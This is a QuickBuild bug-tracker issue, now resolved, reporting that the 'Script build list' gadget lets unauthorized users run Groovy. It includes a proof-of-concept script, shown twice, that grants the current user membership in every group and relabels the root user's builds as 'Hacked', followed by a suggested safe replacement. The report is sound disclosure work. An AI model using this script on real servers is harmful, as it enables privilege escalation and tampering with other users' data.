|
If you were logged in you would be able to see more operations.
|
|
|
QuickBuild
Created: 29/Jan/26 11:08 AM
Updated: 30/Jan/26 03:35 AM
|
|
| Component/s: |
None
|
| Affects Version/s: |
None
|
| Fix Version/s: |
14.0.34
|
|
|
Original Estimate:
|
Unknown
|
Remaining Estimate:
|
Unknown
|
Time Spent:
|
Unknown
|
|
|
The right to create and execute code is granted in many places. In particular, users do not need any permissions to use the "Script build list" gadget.
Example of a dangerous script use for Script build list.
```
groovy:
import com.pmease.quickbuild.Context;
import com.pmease.quickbuild.model.Build;
import com.pmease.quickbuild.SearchCriteria;
import org.hibernate.criterion.Restrictions;
import org.hibernate.criterion.Criterion;
import org.hibernate.criterion.Order;
import com.pmease.quickbuild.entitymanager.BuildManager;
import com.pmease.quickbuild.model.Group
import com.pmease.quickbuild.entitymanager.GroupManager
import com.pmease.quickbuild.model.User
import com.pmease.quickbuild.entitymanager.UserManager
import com.pmease.quickbuild.model.Membership;
import com.pmease.quickbuild.entitymanager.MembershipManager;
// --- Hack admin permission ---
Collection<Group> groups = GroupManager.instance.getAll()
MembershipManager.instance.assign(Context.getUser(), groups, false)
// --- End - Hack admin permission ---
// --- Hack builds of root user ---
User rootUser = UserManager.instance.get(1)
Criterion[] criterions = [Restrictions.eq("requester", rootUser)];
Order[] orders = [Order.desc("beginDate")];
def criteria = new SearchCriteria(criterions, orders);
def builds = system.buildManager.search(criteria, 0, 10);
for(Build build in builds){
build.setVersion("Hacked")
BuildManager.instance.save(build);
}
// --- End - Hack builds of root user ---
return new ArrayList<Build>();
```
With "Script build list" gadget. I suggest editing it to "My build" gadget. It contains a fixed script instead of allowing filling.
Example:
```
groovy:
import com.pmease.quickbuild.Context;
import com.pmease.quickbuild.model.Build;
import com.pmease.quickbuild.SearchCriteria;
import org.hibernate.criterion.Restrictions;
import org.hibernate.criterion.Criterion;
import org.hibernate.criterion.Order;
if (Context.getUser() != null) {
Criterion[] criterions = [Restrictions.eq("requester", Context.getUser())];
Order[] orders = [Order.desc("beginDate")];
def criteria = new SearchCriteria(criterions, orders);
return system.buildManager.search(criteria, 0, #limit_setting(default=10));
} else {
return new ArrayList<Build>();
}
```
|
|
Description
|
The right to create and execute code is granted in many places. In particular, users do not need any permissions to use the "Script build list" gadget.
Example of a dangerous script use for Script build list.
```
groovy:
import com.pmease.quickbuild.Context;
import com.pmease.quickbuild.model.Build;
import com.pmease.quickbuild.SearchCriteria;
import org.hibernate.criterion.Restrictions;
import org.hibernate.criterion.Criterion;
import org.hibernate.criterion.Order;
import com.pmease.quickbuild.entitymanager.BuildManager;
import com.pmease.quickbuild.model.Group
import com.pmease.quickbuild.entitymanager.GroupManager
import com.pmease.quickbuild.model.User
import com.pmease.quickbuild.entitymanager.UserManager
import com.pmease.quickbuild.model.Membership;
import com.pmease.quickbuild.entitymanager.MembershipManager;
// --- Hack admin permission ---
Collection<Group> groups = GroupManager.instance.getAll()
MembershipManager.instance.assign(Context.getUser(), groups, false)
// --- End - Hack admin permission ---
// --- Hack builds of root user ---
User rootUser = UserManager.instance.get(1)
Criterion[] criterions = [Restrictions.eq("requester", rootUser)];
Order[] orders = [Order.desc("beginDate")];
def criteria = new SearchCriteria(criterions, orders);
def builds = system.buildManager.search(criteria, 0, 10);
for(Build build in builds){
build.setVersion("Hacked")
BuildManager.instance.save(build);
}
// --- End - Hack builds of root user ---
return new ArrayList<Build>();
```
With "Script build list" gadget. I suggest editing it to "My build" gadget. It contains a fixed script instead of allowing filling.
Example:
```
groovy:
import com.pmease.quickbuild.Context;
import com.pmease.quickbuild.model.Build;
import com.pmease.quickbuild.SearchCriteria;
import org.hibernate.criterion.Restrictions;
import org.hibernate.criterion.Criterion;
import org.hibernate.criterion.Order;
if (Context.getUser() != null) {
Criterion[] criterions = [Restrictions.eq("requester", Context.getUser())];
Order[] orders = [Order.desc("beginDate")];
def criteria = new SearchCriteria(criterions, orders);
return system.buildManager.search(criteria, 0, #limit_setting(default=10));
} else {
return new ArrayList<Build>();
}
``` |
Show » |
|
Change by Robin Shen [30/Jan/26 12:42 AM]
|
| Field |
Original Value |
New Value |
|
Summary
|
Serious error related to the execute script.
|
Gadget may execute script by unauthorized users
|
|
Change by Robin Shen [30/Jan/26 12:56 AM]
|
|
Status
|
Open
[ 1
]
|
Resolved
[ 5
]
|
|
Resolution
|
|
Fixed
[ 1
]
|
|
Change by QuickBuild Bot [30/Jan/26 03:29 AM]
|
|
Fix Version/s
|
|
14.0.34
[ 12581
]
|
|
Bug
Resolved
Critical
Gadget may execute script by unauthorized users